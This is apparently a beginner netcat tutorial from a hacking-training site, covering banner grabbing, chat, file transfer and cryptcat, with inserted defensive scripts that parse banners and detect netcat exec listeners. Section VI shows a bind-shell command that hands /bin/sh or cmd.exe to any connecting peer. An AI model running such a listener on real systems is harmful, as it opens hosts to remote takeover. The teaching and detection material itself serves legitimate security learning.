By otw

Netcat, the All-Powerful

Netcat is one of those few tools, like nmap, Metasploit, Wireshark and a few others, that every hacker should be familiar with. It is simple, elegant and has a multitude of uses.

For instance, netcat can be used to:

  • scan to see if a port is open on a remote system

  • pull the banner from a remote system

  • connect to a network service manually

  • remote administration


This lesson will be dedicated to learning to use netcat and its encrypted cousin, cryptcat. Later in your studies, we will find many uses for this simple tool.


Like so many applications in the Linux world, netcat runs in a client and server mode. This means that when using netcat we must designate one side as the server and the other as the client.

I. Netcat Basics

Let's start off by looking at the help screen for netcat. When using netcat, the command is simply "nc". To get the help screen, type:


kali > nc -h


Note a few key switches:

-e execute

-l listen mode

-n numeric mode (no DNS lookups; it's faster)

-p designates the port

-u UDP mode

-v verbose output


II. Create a Simple TCP Connection


Netcat can be used to create a simple TCP or UDP connection to a system to see whether a port and its service are available. So, for instance, if I wanted to connect to SSH on another Kali system, I can type:


kali > nc -vn 192.168.1.103 22


As you can see, netcat was able to connect to OpenSSH on a remote server, and the server advertised the service with its banner (SSH-2.0-OpenSSH_4.7p1 Debian-8Ubuntu1).


III. Banner Grabbing

We can also use netcat to "grab" the banner on web servers by connecting to port 80 and then sending an HTTP HEAD request (HEAD / HTTP/1.0).


kali > nc -vn 192.168.1.103 80


HEAD / HTTP/1.0


Make certain to hit "Enter" a couple of times after typing the HEAD request to pull the banner.


As you can see, we grabbed the banner of the Apache 2.2.8 web server running on Ubuntu.
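
The banners from sections II and III can be split into product and version fields, which is how you would inventory what your own servers disclose. This is an added example, not code from the original post; the function names and the sample HTTP response are constructed for illustration, and only the SSH banner string comes from the text above.

```shell
#!/bin/sh
# Added example: turn banners captured with nc into product/version fields.

# SSH identification string: SSH-<proto>-<software>[ <comment>] (RFC 4253, section 4.2)
parse_ssh_banner() (
  line=$(printf '%s' "$1" | tr -d '\r')      # servers end the line with CR LF
  case $line in SSH-*-*) ;; *) exit 1 ;; esac
  rest=${line#SSH-}                          # 2.0-OpenSSH_4.7p1 Debian-8Ubuntu1
  proto=${rest%%-*}
  soft=${rest#*-}
  comment=
  case $soft in
    *" "*) comment=${soft#* }; soft=${soft%% *} ;;
  esac
  printf 'proto=%s software=%s comment=%s\n' "$proto" "$soft" "$comment"
)

# Read a raw HTTP response on stdin and print the Server header value.
# Returns non-zero when the response carries no Server header.
parse_http_server() {
  tr -d '\r' | awk '
    /^$/ { exit }                            # blank line: end of headers
    tolower($0) ~ /^server:/ {
      sub(/^[^:]*:[ \t]*/, ""); print; found = 1; exit
    }
    END { exit !found }'
}

# Constructed response; the post only says Apache 2.2.8 running on Ubuntu.
sample_http() {
  printf 'HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Ubuntu)\r\nConnection: close\r\n\r\n'
}

parse_ssh_banner 'SSH-2.0-OpenSSH_4.7p1 Debian-8Ubuntu1'
sample_http | parse_http_server
```
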


IV. Opening TCP connection between two machines for "chat"

Netcat is capable of creating a simple TCP or UDP connection between two computers and then opening a communication channel between them. Let's open a listener on the remote system first.


kali > nc -l -p6996


Then connect to that listener from a remote machine:

kali > nc 192.168.1.105 6996


When it connects, I can then begin typing my message, such as "What is the best place to learn hacking?"


That message will then appear on the remote system with the listener. The listener machine can then respond, "Without a doubt, Hackers-Arise!"


...and then the remote machine receives the response!




In this way, we can create a private "chat room" between any two machines!



V. Transferring Files with Netcat


One of the simple wonders of netcat is its ability to transfer files between computers. By creating this simple connection, we can then use that connection to transfer files between two computers. This can be extremely useful as a network administrator and even more useful as a hacker. Netcat can be used to upload and download files from and to the target system.


Let's create a file called "hacker_training".


kali > echo "This is first module in Hacker Fundamentals at Hackers-Arise" > hacker_training


Then, let's view the contents of that file using the Linux command "cat".

kali > cat hacker_training


Now, let's open a listener on the remote system.


kali > nc -l -p6996


Next, let's send the file to the remote system.


kali > nc 192.168.1.103 6996 <hacker_training


Note that we use < to redirect the file into netcat.

Finally, go back to our listening system and we should find that the file has been transferred and appears on the screen!



VI. Remote Administration with netcat

Probably the most malicious use of netcat, and the most effective for the hacker, is the ability to use netcat for remote administration. We can use netcat's ability to execute commands to give the remote connection a shell on the listening system. We can do this on a Linux/Unix machine by making /bin/sh available to the remote connection with the -e (execute) switch, as shown below. If we were connecting to a Windows machine, we could use cmd.exe (-e cmd.exe) instead of /bin/sh.


kali > nc -l -p6996 -e /bin/sh


Now when I connect to the remote machine, I should be able to get a shell on the remote system. Notice that when I connect to the remote system, I get just a blank line, no command prompt, nothing (if we connect to a Windows system, though, we will get the traditional Windows C: > prompt). This can be confusing to the novice.


If we then type "ls -l", we get a directory listing from the directory where we started the netcat listener on the remote system, and when we enter "ifconfig", we can see that it returns the IP address of our remote system.
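
A listener started with -e shows up in the process table of the host running it, which gives defenders a simple check. The following is an added example, not part of the original lesson: it scans `ps -eo pid,user,args` output for netcat processes carrying an exec switch. The process listing and the function name `find_nc_exec` are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat processes that were started with an exec switch.
# Expected input: the output of `ps -eo pid,user,args`, header line included.

find_nc_exec() {
  awk 'NR > 1 {
    base = $3; sub(/^.*\//, "", base)              # argv[0] without its directory
    if (base !~ /^(nc|ncat|netcat|nc\.traditional)$/) next
    for (i = 4; i <= NF; i++) {
      # -e alone, -e closing a cluster such as -lve, or the ncat long options
      if ($i ~ /^-[A-Za-z]*e$/ || $i ~ /^--(sh-)?exec$/) {
        print $1, $2, (i < NF ? $(i + 1) : "?")    # pid, user, program given to the peer
        next
      }
    }
  }'
}

# Constructed process listing for illustration, not captured from a real host.
sample_ps() {
  cat <<'EOF'
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 2301 www-data nc -l -p6996 -e /bin/sh
 2340 alice    nc -vn 192.168.1.103 22
 2377 bob      ncat --sh-exec /bin/bash -l 4444
 2410 carol    nc -l -p6996
 2455 dave     /bin/netcat -lve /bin/sh -p 6996
EOF
}

sample_ps | find_nc_exec
```

On a live host, run `ps -eo pid,user,args | find_nc_exec`; an empty result means no running netcat carries an exec switch, not that none ran earlier.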




VII. Cryptcat

Cryptcat is netcat's encrypted cousin. This means that we can make a connection to a remote machine where all our traffic is encrypted with one of the strongest encryption algorithms available anywhere, Twofish (Twofish encryption is nearly as strong as AES). You can download it at www.cryptcat.sourceforge.net, but if you are using Kali, it is already installed. Although the switches are largely the same as netcat's, the command is "cryptcat" rather than "nc".
